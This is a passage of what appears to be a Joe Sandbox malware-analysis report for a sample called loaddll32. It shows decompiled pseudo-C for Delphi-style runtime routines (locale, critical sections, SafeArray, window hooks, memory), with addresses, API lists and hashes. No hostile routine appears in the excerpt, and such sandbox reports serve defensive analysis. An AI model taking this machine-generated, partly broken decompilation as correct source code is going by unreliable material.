											L24:
											E00704330(_t122, 0x70b6a4);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00704250();
												E00704330(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00704330(_t122, 0x70b698);
										_t92 = _t92 + 1;
									}
								} else {
									E00704330(_t122, 0x70b684);
									_t92 = _t92 + 3;
								}
							} else {
								E00704330(_t122, 0x70b670);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0070C538(_t124, _t92);
							E00704588(_t124, _v8, _t92,  &_v20);
							E00704330(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x76f748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E007040BC(_t122, _t124);
					} else {
						while(_t92 <= E00704328(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00704250();
									E00704330(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0070B651);
				return E0070408C( &_v24, 4);
			}

0x0070b480
0x0070b485
0x0070b486
0x0070b487
0x0070b488
0x0070b489
0x0070b48d
0x0070b48f
0x0070b493
0x0070b494
0x0070b499
0x0070b49c
0x0070b49f
0x0070b4a6
0x0070b4be
0x0070b4d6
0x0070b620
0x0070b622
0x0070b627
0x0070b629
0x00000000
0x00000000
0x0070b53f
0x0070b544
0x0070b54b
0x0070b589
0x0070b58e
0x0070b590
0x0070b5af
0x0070b5b4
0x0070b5b6
0x0070b5d7
0x0070b5dc
0x0070b5de
0x0070b5f3
0x0070b5f3
0x0070b5f5
0x0070b5fb
0x0070b602
0x0070b5f7
0x0070b5f7
0x0070b5f9
0x0070b610
0x0070b61a
0x00000000
0x00000000
0x00000000
0x0070b5f9
0x0070b5e0
0x0070b5e7
0x0070b5ec
0x0070b5ec
0x0070b5b8
0x0070b5bf
0x0070b5c4
0x0070b5c4
0x0070b592
0x0070b599
0x0070b59e
0x0070b59e
0x0070b61f
0x0070b61f
0x0070b54d
0x0070b556
0x0070b564
0x0070b56e
0x0070b573
0x0070b573
0x0070b54b
0x0070b4dc
0x0070b4dc
0x0070b4e1
0x0070b4e4
0x0070b4f2
0x0070b4ee
0x0070b4ee
0x0070b4ee
0x0070b4f6
0x0070b531
0x0070b4f8
0x0070b51d
0x0070b4fe
0x0070b4fe
0x0070b500
0x0070b502
0x0070b504
0x0070b50d
0x0070b517
0x0070b517
0x0070b504
0x0070b51c
0x0070b51c
0x0070b51c
0x0070b528
0x0070b4f6
0x0070b62f
0x0070b631
0x0070b634
0x0070b637
0x0070b649

APIs

GetThreadLocale.KERNEL32(?,00000000,0070B64A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0070B4AF

Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166

Strings

eeee, xrefs: 0070B5BA
ggg, xrefs: 0070B594
yyyy, xrefs: 0070B5A1

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: af828af61fc627deff3df396055f21784c4b240f33f83be1716c2c1dea9444e2
Instruction ID: 1438c70bbac3b1f65e332f7247674b13cb953f8d516a64119b73caabf88dd3db
Opcode Fuzzy Hash: af828af61fc627deff3df396055f21784c4b240f33f83be1716c2c1dea9444e2
Instruction Fuzzy Hash: 1F41F0B0704105CBD715AAA8D8996BEF2E6EB85300F644775F542D33C6DB3DEF028662

Uniqueness

Uniqueness Score: -1.00%

Function 007254FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E007254FC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00703244(1);
				_push(_t77);
				_push(0x725583);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x715420; // 0x71546c
				 *((intOrPtr*)(_v12 + 0x6c)) = E00703424(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x76f8b0);
				L00706368();
				_push(_t77);
				_push(0x7255e3);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				L00723F84( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				L00723F80(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x7255ea);
				_push(0x76f8b0);
				L007064A8();
				return 0;
			}

0x007254fd
0x007254ff
0x00725509
0x00725518
0x0072551d
0x0072551e
0x00725523
0x00725526
0x0072552c
0x00725532
0x00725545
0x00725545
0x0072554d
0x00725557
0x00725562
0x00725562
0x00725568
0x00725576
0x0072557b
0x0072557e
0x0072559a
0x0072559f
0x007255a6
0x007255a7
0x007255ac
0x007255af
0x007255b8
0x007255c3
0x007255c6
0x007255cd
0x007255d0
0x007255d3
0x007255d8
0x007255dd
0x007255e2

APIs

RtlEnterCriticalSection.KERNEL32(0076F8B0), ref: 0072559F
RtlLeaveCriticalSection.KERNEL32(0076F8B0,007255EA,0076F8B0), ref: 007255DD

Strings

lTq, xrefs: 00725568
dq, xrefs: 0072550E

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: dq$lTq
API String ID: 3168844106-2665862785
Opcode ID: 16ccaf83bfe11e033dcd9b0a68848b88450cf062731e9f65a4e2c3313485ecc6
Instruction ID: e44a5d1f17bbb598c529624b88379791fa15e44566246c7c3b4e1abffc1ebd71
Opcode Fuzzy Hash: 16ccaf83bfe11e033dcd9b0a68848b88450cf062731e9f65a4e2c3313485ecc6
Instruction Fuzzy Hash: 5121B075A04744EFDB01DF69E881889BBF6FB4C720F1181A5F80497391C738EE80CA90

Uniqueness

Uniqueness Score: -1.00%

Function 007270E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E007270E0(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x76f91e != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x76f8fc; // 0x7270e0
					 *0x76f8fc = E00726F70(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x76f8fc(_t14, _t17);
				}
				return _t19;
			}

0x007270e6
0x007270e9
0x007270f3
0x00727118
0x00727121
0x00727148
0x00727148
0x007270f5
0x007270fa
0x00727107
0x00727114
0x00727114
0x00727153

APIs

GetSystemMetrics.USER32 ref: 00727131
GetSystemMetrics.USER32 ref: 0072713D

Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0

Strings

pr, xrefs: 007270FA, 00727107, 0072710E
MonitorFromRect, xrefs: 007270F5

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect$pr
API String ID: 1792783759-3225576265
Opcode ID: 2ac9f2da3abb389eae38626cf75330ad04071bceffd7b4831a9c558ae8505080
Instruction ID: 18037316eb6c3a67cc3ed893127703f88b4f993d026a079061600e724da18cff
Opcode Fuzzy Hash: 2ac9f2da3abb389eae38626cf75330ad04071bceffd7b4831a9c558ae8505080
Instruction Fuzzy Hash: 8D01A231204329DFDB148B05FE86B16B7A5EF91391F18D0A2E945CB202C2BCDD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0070CECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070CECC() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x76c140 = _t1;
				}
				if( *0x76c140 == 0) {
					 *0x76c140 = E00708914;
					return E00708914;
				}
				return _t1;
			}

0x0070ced2
0x0070ced7
0x0070cedb
0x0070cee3
0x0070cee8
0x0070cee8
0x0070cef4
0x0070cefb
0x00000000
0x0070cefb
0x0070cf01

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0070D935,00000000,0070D948), ref: 0070CED2
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0070CEE3

Strings

GetDiskFreeSpaceExA, xrefs: 0070CEDD
kernel32.dll, xrefs: 0070CECD

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: e7462212a740effe4bf57389016fbec03bab89e5f4528c7f7856a773f0ee6ec9
Instruction ID: cb902756ecdb252041aad5655ce4108ec99bc1f64d38cf6255c80f04d7b8bc43
Opcode Fuzzy Hash: e7462212a740effe4bf57389016fbec03bab89e5f4528c7f7856a773f0ee6ec9
Instruction Fuzzy Hash: CBD0A7E1200386CFFB13BBA55C8573235C5A311708B008334F041CA2C3EBFC59044326

Uniqueness

Uniqueness Score: -1.00%

Function 0070EDAC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0070EDAC(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0070EBF4(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0070DE04();
							E0070EBF4(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0070DE0C();
							E0070EBF4(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0070ED50(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0070ED20(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0070DE14();
						E0070EBF4(_v780);
						E0070EFA4(_v792);
					}
				}
				L15:
				_push(_v776);
				L0070D9A0();
				return E0070EBF4(_v776);
			}

0x0070edb8
0x0070edc8
0x0070edcf
0x0070edcf
0x0070edda
0x0070ede8
0x0070edf7
0x0070ee15
0x0070edf9
0x0070ee04
0x0070ee04
0x0070ee24
0x0070ee30
0x0070ee33
0x0070ee35
0x0070ee36
0x0070ee38
0x0070ee3e
0x0070ee40
0x0070ee4f
0x0070ee50
0x0070ee5a
0x0070ee5b
0x0070ee60
0x0070ee6b
0x0070ee6c
0x0070ee76
0x0070ee77
0x0070ee7c
0x0070ee97
0x0070ee99
0x0070ee9a
0x0070ee9d
0x0070ee9d
0x0070ee3e
0x0070eea6
0x0070eea9
0x0070eeab
0x0070eeac
0x0070eeb2
0x0070eeb8
0x0070eeba
0x0070eebc
0x0070eebf
0x0070eec2
0x0070eec2
0x0070eec5
0x00000000
0x00000000
0x00000000
0x0070eec5
0x0070eec5
0x0070eecc
0x0070eed7
0x0070eedf
0x0070eee6
0x0070eeed
0x0070eeee
0x0070eef3
0x0070eefe
0x0070eefe
0x0070ef0c
0x0070ef10
0x0070ef16
0x0070ef17
0x0070ef27

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0070EE5B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0070EE77
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0070EEEE
VariantClear.OLEAUT32(?), ref: 0070EF17

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
Instruction ID: 6080552d01d70b07cf9d3022600b6b30b9ff3bcd25e2fa9e75a92fc1bc0a26cb
Opcode Fuzzy Hash: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
Instruction Fuzzy Hash: CE4108B5A0122DDFCB61DB58C894AC9B3FCAF58300F0046D5E649E7292DA38AF858F50

Uniqueness

Uniqueness Score: -1.00%

Function 0070C8F0 Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070C8F0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x76f744 = 0x409;
				 *0x76f748 = 9;
				 *0x76f74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x76f744 = _t14;
				}
				if(_t14 != 0) {
					 *0x76f748 = _t14 & 0x3ff;
					 *0x76f74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x76c11c, 0x70ca44, 8 << 2);
				if( *0x76c0d4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x76f751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x76f750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0070C878(__eflags, _t49);
					}
				} else {
					_t20 = E0070C8D8();
					if(_t20 != 0) {
						 *0x76f751 = 0;
						 *0x76f750 = 0;
						return _t20;
					}
					E0070C878(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00702DA4(0x76c11c, 0x20, 0x70ca44);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x76f750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x76f751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x76f744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x76f751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

0x0070c8fc
0x0070c906
0x0070c910
0x0070c91a
0x0070c921
0x0070c923
0x0070c923
0x0070c92b
0x0070c937
0x0070c943
0x0070c943
0x0070c957
0x0070c960
0x0070ca0f
0x0070ca14
0x0070ca19
0x0070ca20
0x0070ca25
0x0070ca27
0x0070ca2a
0x0070ca30
0x0070ca32
0x00000000
0x0070ca3a
0x0070c966
0x0070c966
0x0070c96d
0x0070c96f
0x0070c976
0x00000000
0x0070c976
0x0070c983
0x0070c993
0x0070c995
0x0070c99a
0x0070c99d
0x0070c9a3
0x0070c9a5
0x0070c9a7
0x00000000
0x0070c9a7
0x0070c9b3
0x0070c9b8
0x0070c9be
0x0070c9be
0x0070c9c0
0x0070c9c1
0x0070c9c2
0x0070c9c2
0x0070c9de
0x0070c9e4
0x0070c9e9
0x0070c9ee
0x0070c9f4
0x0070c9f4
0x0070c9f8
0x0070c9fb
0x0070ca01
0x0070ca03
0x00000000
0x00000000
0x0070ca05
0x0070ca08
0x0070ca08
0x0070ca09
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0070ca09
0x0070c9f4
0x0070ca41
0x0070ca41
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0070C9E4
GetThreadLocale.KERNEL32 ref: 0070C91A

Part of subcall function 0070C878: GetCPInfo.KERNEL32(00000000,?), ref: 0070C891

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: fe21303bc7281f27f88b61c6e1a94939448b8d28aa29a24a8bd2c7217f68b2f8
Instruction ID: b1439565e960d1082d1630731d0809993341493e12ab143ae325a43b86208b31
Opcode Fuzzy Hash: fe21303bc7281f27f88b61c6e1a94939448b8d28aa29a24a8bd2c7217f68b2f8
Instruction Fuzzy Hash: 583178A1644389CBD312EB24BC167A537D8EB12301F94C375E8858B2D2DFFC8849C769

Uniqueness

Uniqueness Score: -1.00%

Function 0073714C Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0073714C(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x76fb1c; // 0x23f184c
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x76fb34 == 0) {
						_t2 = SetWindowsHookExA(3, 0x737108, 0, GetCurrentThreadId());
						 *0x76fb34 = _t2;
					}
					if( *0x76fb30 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x76fb30 = _t2;
					}
					if( *0x76fb38 == 0) {
						_t2 = CreateThread(0, 0x3e8,  &M007370AC, 0, 0, _t7);
						 *0x76fb38 = _t2;
					}
				}
				return _t2;
			}

0x0073714d
0x00737159
0x00737162
0x00737174
0x00737179
0x00737179
0x00737185
0x0073718f
0x00737194
0x00737194
0x007371a0
0x007371b3
0x007371b8
0x007371b8
0x007371a0
0x007371be

APIs

GetCurrentThreadId.KERNEL32 ref: 00737164
SetWindowsHookExA.USER32 ref: 00737174
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00739951,?,?,023F184C,00000000,?,007392F8), ref: 0073718F
CreateThread.KERNEL32 ref: 007371B3

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: efe0956ee3bd36ddd7a39a9b78252c9caa3b623916dfe3ec2e5c96733e8c7268
Instruction ID: 78319218c6178d03ebd39f6268237ceb59ee6e336986eecf3d180eca19cf7f9d
Opcode Fuzzy Hash: efe0956ee3bd36ddd7a39a9b78252c9caa3b623916dfe3ec2e5c96733e8c7268
Instruction Fuzzy Hash: 89F03AF26C8304EEF334AB30EC6AF193694A751B16F205134F209A94D2C3FC5481C669

Uniqueness

Uniqueness Score: -1.00%

Function 00706C9C Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00706C9C(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00706c9f
0x00706ca6
0x00706cab
0x00706cb1
0x00706cb6

APIs

GlobalHandle.KERNEL32 ref: 00706C9F
GlobalUnWire.KERNEL32(00000000), ref: 00706CA6
GlobalReAlloc.KERNEL32 ref: 00706CAB
GlobalFix.KERNEL32 ref: 00706CB1

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: b3c3200dcf28e66005d7d6615d4713dcd35b49e86f5b1bd8be8d9eaaba0cf08f
Instruction ID: 3654d3cf6876641bc8ad2422513a703d55a784e62fcbd35eaea7cc3a8aaad82f
Opcode Fuzzy Hash: b3c3200dcf28e66005d7d6615d4713dcd35b49e86f5b1bd8be8d9eaaba0cf08f
Instruction Fuzzy Hash: E7B009E88A0280FDE91473B85C2FD7F009C98A5F493808B887405E2082E86CAA240035

Uniqueness

Uniqueness Score: -1.00%

Function 00728204 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00728204(void* __eax, void* __ebx, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				void* _t75;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t134;
				void* _t150;
				void* _t153;
				void* _t154;
				intOrPtr _t155;

				_t153 = _t154;
				_t155 = _t154 + 0xfffffff0;
				_v20 = 0;
				_t112 = __eax;
				_push(_t153);
				_push(0x728396);
				_push( *[fs:eax]);
				 *[fs:eax] = _t155;
				_t148 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 8)) != 1) {
					if( *((intOrPtr*)(__eax + 0xc)) == 0) {
						_t149 =  *((intOrPtr*)(__eax + 0x10));
						if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 8)) <= 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC(_t149, 0) + 4)))) + 0x18))() == 0) {
							L0070B9C0(0x727ec8, 1);
							L00703A00();
						} else {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_t112 + 0x10)), 0) + 4)))) + 0x1c))();
						}
						goto L17;
					} else {
						_v8 = E00703244(1);
						_push(_t153);
						_push(0x728331);
						_push( *[fs:eax]);
						 *[fs:eax] = _t155;
						_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x10)) + 8)) - 1;
						if(_t75 >= 0) {
							_v16 = _t75 + 1;
							_v12 = 0;
							do {
								_t150 = L007278AC( *((intOrPtr*)(_t112 + 0x10)), _v12);
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t150 + 4)))) + 0x18))() != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t150 + 4)))) + 0xc))();
									 *((intOrPtr*)( *_v8 + 0x3c))();
								}
								_v12 = _v12 + 1;
								_t27 =  &_v16;
								 *_t27 = _v16 - 1;
							} while ( *_t27 != 0);
						}
						if( *((intOrPtr*)( *_v8 + 0x14))() - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(SetForegroundWindow() + 4)))) + 0x1c))();
						} else {
							 *((intOrPtr*)( *_v8 + 0x90))();
							_v12 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0xc)))) + 0x10))();
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x18))() + 4)))) + 0x1c))();
						}
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x728380);
						return E00703274(_v8);
					}
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC(_t148, 0) + 4)))) + 0x18))() != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_t112 + 0x10)), 0) + 4)))) + 0x1c))();
					}
					L17:
					_pop(_t125);
					 *[fs:eax] = _t125;
					return CharNextW(0x72839d);
				}
			}

0x00728205
0x00728207
0x0072820e
0x00728211
0x00728215
0x00728216
0x0072821b
0x0072821e
0x00728221
0x00728228
0x0072825e
0x00728338
0x0072833f
0x00728376
0x0072837b
0x00728356
0x00728365
0x00728365
0x00000000
